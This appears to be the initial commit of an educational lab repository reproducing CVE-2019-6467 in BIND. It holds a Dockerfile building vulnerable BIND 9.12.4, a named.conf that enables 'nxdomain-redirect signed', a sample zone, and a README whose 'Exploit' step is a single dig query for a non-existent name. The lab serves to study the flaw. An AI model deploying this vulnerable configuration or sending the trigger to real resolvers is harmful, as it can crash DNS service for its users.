initial

Dockerfile

@@ -0,0 +1,52 @@
+FROM centos:7
+MAINTAINER knqyf263
+
+ENV version 9.12.4
+
+# Install packages
+RUN yum -y update \
+    && yum -y groupinstall "Development Tools" \
+    && yum install -y epel-release \
+    && yum -y install kernel-devel kernel-headers openssl-devel perl-Net-DNS wget bind-utils vim tar python-pip \
+    && pip install --upgrade pip && pip install argparse ply
+
+# Install BIND9 from source
+RUN cd /usr/local/src && \
+    wget ftp://ftp.isc.org/isc/bind9/${version}/bind-${version}.tar.gz && \
+    tar zxvf bind-${version}.tar.gz && \
+    mv bind-${version} bind && \
+    rm bind-${version}.tar.gz
+RUN cd /usr/local/src/bind && \
+    ./configure --enable-syscalls --prefix=/var/named/chroot --enable-threads --with-openssl=yes --enable-openssl-version-check --enable-ipv6 --disable-linux-caps && \
+    chown -R root:root /usr/local/src/bind && \
+    make && \
+    make install
+
+# Create device files
+RUN mkdir /var/named/chroot/dev && \
+    mknod -m 666 /var/named/chroot/dev/null c 1 3 && \
+    mknod -m 666 /var/named/chroot/dev/random c 1 8
+
+# Create rndc key
+RUN /var/named/chroot/sbin/rndc-confgen -a
+
+RUN mkdir /var/named/chroot/data && \
+    mkdir /var/named/chroot/var/log && \
+    mkdir /var/named/chroot/var/named
+
+# Create hint file
+RUN cd /var/named/chroot/var/named && \
+    wget ftp://ftp.nic.ad.jp/internet/rs.internic.net/domain/named.root
+
+# Add files
+ADD ./contents/named.conf /var/named/chroot/etc/named.conf
+ADD ./contents/named /etc/sysconfig/named
+ADD ./contents/example.com.zone /var/named/chroot/var/named/example.com.zone
+
+# Create symbolic link
+RUN ln -s /var/named/chroot/etc/rndc.key /etc/rndc.key && \
+    ln -s /var/named/chroot/etc/named.conf /etc/named.conf
+
+EXPOSE 53 953
+
+CMD ["/var/named/chroot/sbin/named", "-g", "-t", "/var/named/chroot", "-c", "/etc/named.conf"]

README.md

@@ -1,2 +1,26 @@
 # CVE-2019-6467
-CVE-2019-6467 (BIND nxdomain-redirect)
+BIND nxdomain-redirect
+
+For educational purposes only
+
+![demo](imgs/cve-2019-6467.gif)
+
+## Run
+
+```
+$ docker run --rm --name cve-2019-6467 -it -p 53:53/udp knqyf263/cve-2019-6467
+```
+
+## Exploit
+Normal query
+
+```
+$ dig @127.0.0.1 nxdomain.example.com
+```
+
+`nxdomain` can be replaced by anything that means non-existent domain name. (e.g. foobar.example.com)
+
+
+## Reference
+- https://ftp.isc.org/isc/bind/9.12.4-P1/RELEASE-NOTES-bind-9.12.4-P1.html
+- https://ftp.isc.org/isc/bind9/9.14.1/RELEASE-NOTES-bind-9.14.1.html

contents/example.com.zone

@@ -0,0 +1,20 @@
+$ORIGIN example.com.
+$TTL 3600       ; 1 hour
+@ IN SOA ns1.example.com. postmaster.example.com. (
+        2015012902  ; serial
+        3600        ; refresh (1 hour)
+        1200        ; retry (20 min.)
+        1209600     ; expire (2 weeks)
+        900         ; minimum (15 min.)
+        )
+@       IN  NS      ns1.example.com.
+@       IN  NS      ns2.example.com.
+@       IN  MX      10 mail.example.com.
+@       IN  TXT     "v=spf1 mx ~all"    ; TXT
+@       IN  SPF     "v=spf1 mx ~all"    ; SPF
+
+ns1     IN  A       192.168.1.2
+ns2     IN  A       192.168.1.3
+mail    IN  A       192.168.1.4
+host1   IN  A       192.168.1.5
+www     IN  CNAME   host1

contents/named

@@ -0,0 +1,2 @@
+ROOTDIR=/var/named/chroot
+OPTIONS=-4

contents/named.conf

@@ -0,0 +1,80 @@
+Controls {
+        inet 127.0.0.1 allow { localhost; } keys { rndc-key; };
+};
+
+include "/etc/rndc.key";
+
+acl "internal-network" {
+        localhost;
+        127.0.0.1/32;
+        172.16.0.0/12;
+        192.168.0.0/16;
+};
+
+options {
+        version "unknown";
+        hostname "ns1.test.example.com";
+
+        directory "/var/named";
+        dump-file "/data/cache_dump.db";
+        statistics-file "/data/named_status.dat";
+        pid-file "/var/run/named/named.pid";
+
+        listen-on port 53 {
+                internal-network;
+        };
+
+        allow-query { internal-network; };
+
+        recursion yes;
+        allow-recursion { internal-network; };
+
+        notify yes;
+        max-transfer-time-in 60;
+        transfer-format many-answers;
+        transfers-in 10;
+        transfers-per-ns 2;
+        allow-transfer { none; };
+        allow-update { none; };
+
+        nxdomain-redirect signed;
+};
+
+logging {
+        channel "log_default"{
+                file "/var/log/named.log" versions 5 size 5m;
+                print-time yes;
+                severity info;
+                print-category yes;
+        };
+        channel "alert" {
+                file "/var/log/alert.log" versions 8 size 4m;
+                severity  info;
+                print-time yes;
+                print-severity yes;
+                print-category yes;
+        };
+        channel "query" {
+                file "/var/log/query.log" versions 8 size 50m;
+                severity  debug;
+                print-time yes;
+                print-severity yes;
+                print-category yes;
+        };
+
+        category default {"log_default";};
+        category security {"alert";};
+        category queries {"query";};
+        category lame-servers { null; };
+};
+
+zone "." IN {
+        type hint;
+        file "named.root";
+};
+
+zone "example.com." IN {
+        type master;
+        file "example.com.zone";
+        allow-update { none; };
+};